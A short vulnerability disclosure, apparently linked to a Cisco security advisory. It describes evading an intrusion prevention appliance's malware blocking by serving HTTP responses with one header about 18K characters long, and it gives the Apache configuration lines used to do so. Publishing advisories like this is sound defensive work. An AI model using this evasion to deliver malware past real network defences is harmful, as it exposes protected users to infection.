Information

This vulnerability allows remote attackers to bypass malware protection via crafted fields in HTTP headers

Crash Dump

None

PoC

  • The testing appliance was with the most restricted policy - “Maximum_Detection” including Block malware for all file types.
  • The malicious server was configured in a way that each request will be served with a single header in a length ~ 18K
  • A known virus was sent over the network and cough by the IPS, while after adding the long header the virus was delivered successfully.

The HTTP.conf file used for setting up the malicious server (XAMMP):

Header echo ^GET
Header add X-MyHeader1 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa


References:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160330-fp